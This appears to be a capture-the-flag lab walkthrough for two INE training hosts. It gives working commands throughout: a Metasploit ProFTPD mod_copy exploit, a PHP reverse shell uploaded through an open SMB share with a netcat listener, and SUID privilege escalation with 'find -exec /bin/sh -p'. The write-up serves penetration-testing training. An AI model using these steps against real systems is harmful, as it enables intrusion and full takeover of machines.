Host & Network Penetration Testing: Exploitation CTF 3

This lab focuses on identifying and exploiting vulnerabilities across two target machines. By uncovering weaknesses in services and configurations, you’ll retrieve flags from various locations. Tasks include exploiting vulnerable services, interacting with local network services, leveraging misconfigurations, and performing privilege escalation to access restricted directories.

Two machines are accessible at target1.ine.local and target2.ine.local. Enumerate the targets, identify and exploit the misconfigurations or vulnerabilities to capture the flags. The flag is in an md5 hash format.

Flag 1: A vulnerable service maybe running on target1.ine.local. If exploitable, retrieve the flag from the root directory.
Flag 2: Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.
Flag 3: A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?
Flag 4: Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?

Scanning target1.ine.local

┌──(root㉿INE)-[~]
└─# sudo nmap -A target1.ine.local -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 19:51 IST
Nmap scan report for target1.ine.local (192.146.6.3)
Host is up (0.000069s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:42:C0:92:06:03 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/19%OT=21%CT=1%CU=36684%PV=N%DS=1%DC=D%G=Y%M=0242
OS:C0%TM=69455F80%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%T
OS:S=A)SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=FF%GCD=2%ISR=10D%
OS:TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4
OS:=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7C70%W2=7C70%W3=7C70%W4=7
OS:C70%W5=7C70%W6=7C70)ECN(R=Y%DF=Y%T=40%W=7D78%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y
OS:%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%
OS:A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%
OS:DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD
OS:=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.07 ms target1.ine.local (192.146.6.3)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

we can see that the version 1.3.5 of FTP is running so let’s search for an exploit using SearchSploit.

Exploiting ProFTPD 1.3.5

searchsploit  ProFTPD

let’s load up Metasploit and run the exploit. Note that you will need to change the SITEPATH option as on within the documentation of the web page being hosted on port 80, it says that the root web Apache HTTP server is installed at /var/www/html.

msfconsole -q
search ProFTPD 1.3.5
use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts target1.ine.local
set lhost 192.84.104.2
set lport 1122
set SITEPATH /var/www/html
run

we can then upgrade our session to a meterpreter session. Navigate to the root directory to get the flag.

sessions
sessions -u 1
sessions
sessions -i 2
cd /
ls
cat flag1.txt

Flag 2: Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.

In this flag the target’s local network is vulnerable run the following inside the Meterpreter session to list local services on the target:

netstat -ano (Windows)
netstat -tuln 127.0.0.1   (linux)

We can see that port 8888 is open so we can interact with it using Netcat. Lets move back to shell.

Now we can use netcat to connect to the port.

nc 127.0.0.1 8888

Since it asks for a password, let’s use the phrase letmein as that was the hint from the previous flag and we have the second flag.

Flag 3: A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?

In this step again, run an Nmap scan to see what services are running on the target.

┌──(root㉿INE)-[~]
└─# sudo nmap -sC -sV target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 20:08 IST
Nmap scan report for target2.ine.local (192.146.6.4)
Host is up (0.000027s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Can you Pwn me?
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:C0:92:06:04 (Unknown)

Host script results:
| smb2-time: 
|   date: 2025-12-19T14:38:29
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: TARGET2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds

Check for shared folders as well. In this case, we can see that the share site-uploads is accessible without credentials so let's navigate to that in our web browser

smbclient -L target2.ine.local

Let us make a reverse shell and upload it.

ifconfig
cp /usr/share/webshells/php/php-reverse-shell.php .
ls
mousepad php-reverse-shell.php

Please note that when using this PHP reverse shell, you do have to edit some information for it to work. You can use a text editor of your choice (either vim or nano or mousepad). Replace the IP field with your IP address as this is the IP address the shell will connect back to.

In this step we can then upload it to the server by connecting to it using:

smbclient //target2.ine.local/site-uploads
put php-reverse-shell.php
ls

In this step we need to set up a listener using Netcat (nc -lnvp 1234) to listen for when the shell is executed to obtain a reverse connection.

nc -lnvp 1234

Now open up the directory in the web browser again and click on the php-reverse-shell.php file. Then, head over to your Netcat listener and we have obtained access.

In this step, navigate to the root directory to cat out the flag.

ls cat flag3.txt

Flag 4: Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?

In this step we can use one of these shells to escalate our privileges. However, only a shell with all the permissions will be useful. We also need to check for executables with SetUID bit set that can run with root privileges. The SetUID bit set allows users to execute files with the permissions of the file owner’s (e.g. root) which will allow us to escalate our privileges.

Privilege escalation with SUID Binaries

To check for executables with the SetUID bit set that can run with root privileges, we can run the command:

find / -perm -4000 2>/dev/null

This will essentially start searching in the root directory, look for files with the SetUID bit set (-perm -4000). It also suppresses error messages by redirecting them to /dev/null.

We can combine the find command with an executable to spawn a new shell with root privileges.

find . -exec /bin/sh -p \; -quit

Now that we have escalated our privileges we can cat out the last flag using cat /root/flag4.txt.

PreviousHost & Network Penetration Testing: Exploitation CTF 2 NextHost & Network Penetration Testing: Post-Exploitation CTF 1

Last updated 19 days ago